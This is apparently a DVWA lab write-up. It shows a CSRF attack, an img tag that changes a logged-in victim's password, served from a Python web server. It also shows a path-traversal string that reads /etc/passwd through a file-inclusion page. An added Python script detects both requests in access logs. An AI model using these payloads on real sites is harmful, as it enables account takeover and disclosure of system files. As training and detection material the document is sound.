DVWA Exercises 3
Let's type in a password and capture the request in Burp.
The attacker must prepare a website containing a manipulated string. This attack only works if the victim is logged in to the target website (the session cookie must be valid) and clicks on the manipulated link.
Attacker's Side:
cd /home/hacker
mkdir webroot
python3 -m http.server 8001
Create an HTML file with the following content:
<img src="http://10.70.0.1/vulnerabilities/csrf/?password_new=Secret1&password_conf=Secret1&Change=Change">
Victim Side:
Attack string:
http://172.17.0.1/vulnerabilities/fi/?page=../../../../../etc/passwd
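Added example, not part of the original exercise: a Python check a defender could run over the web server's access log to flag both requests shown above, the cross-site password change and the traversal in the page parameter. It assumes the Apache/nginx combined log format; the log lines, the client address 10.70.0.20 and the referring host 192.0.2.10 are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed "combined" log format: client, date, request line, status, size, referer.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

# Constructed sample log lines (not taken from the page).
SAMPLE_LOG = [
    '10.70.0.20 - - [01/Jan/2024:10:00:00 +0000] "GET /vulnerabilities/csrf/?password_new=Secret1&password_conf=Secret1&Change=Change HTTP/1.1" 200 1523 "http://192.0.2.10:8001/index.html" "Mozilla/5.0"',
    '10.70.0.20 - - [01/Jan/2024:10:05:00 +0000] "GET /vulnerabilities/csrf/?password_new=Secret1&password_conf=Secret1&Change=Change HTTP/1.1" 200 1523 "http://10.70.0.1/vulnerabilities/csrf/" "Mozilla/5.0"',
    '10.70.0.20 - - [01/Jan/2024:10:10:00 +0000] "GET /vulnerabilities/fi/?page=../../../../../etc/passwd HTTP/1.1" 200 2100 "-" "Mozilla/5.0"',
    '10.70.0.20 - - [01/Jan/2024:10:15:00 +0000] "GET /vulnerabilities/fi/?page=include.php HTTP/1.1" 200 900 "http://10.70.0.1/vulnerabilities/fi/" "Mozilla/5.0"',
]

def classify(line, site_host):
    """Return a list of findings for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    params = parse_qs(url.query, keep_blank_values=True)  # values are percent-decoded
    findings = []
    # CSRF indicator: password change request whose Referer is not the site itself.
    if url.path.rstrip("/").endswith("/vulnerabilities/csrf") and "password_new" in params:
        ref_host = urlsplit(m["referer"]).hostname  # None when the Referer is "-" or empty
        if ref_host != site_host:
            findings.append(f"csrf-suspect: password change from referer {ref_host or 'none'}")
    # File-inclusion indicator: a ".." path segment or an absolute path in 'page'.
    for value in params.get("page", []):
        if ".." in value.replace("\\", "/").split("/") or value.startswith("/"):
            findings.append(f"lfi-suspect: page={value}")
    return findings

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry, "10.70.0.1"))
```

A missing Referer is also reported as a CSRF suspect, so expect some false positives from clients that strip the header.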